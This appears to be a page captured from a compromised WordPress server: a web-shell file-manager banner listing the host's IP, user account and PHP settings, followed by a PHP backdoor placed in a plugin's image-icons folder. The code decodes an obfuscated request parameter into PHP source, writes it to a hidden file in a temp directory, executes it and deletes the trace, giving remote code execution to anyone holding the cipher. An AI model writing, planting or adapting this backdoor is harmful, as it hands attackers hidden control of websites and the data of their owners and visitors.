| Server IP : 162.243.168.218 / Your IP : 216.73.217.81 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-content/plugins/wp-mail-smtp/assets/images/icons/ |
Upload File : |
<?php
if(!empty($_REQUEST["fac"])){
$ent = $_REQUEST["fac"];
$ent = explode (".", $ent ) ;
$k = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $s);
$w = 0;
while( $w < count( $ent)) {
$v1 = $ent[$w];
$chS = ord( $s[$w % $sLen]);
$dec = ( ( int)$v1 - $chS -( $w % 10)) ^ 69;
$k .= chr( $dec);
$w++; }
$pointer = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP"), getcwd(), session_save_path(), "/var/tmp", sys_get_temp_dir()]);
while ($binding = array_shift($pointer)) {
if (is_writable($binding) && is_dir($binding)) {
$marker = "$binding/.hld";
if (file_put_contents($marker, $k)) {
include $marker;
@unlink($marker);
die();
}
}
}
}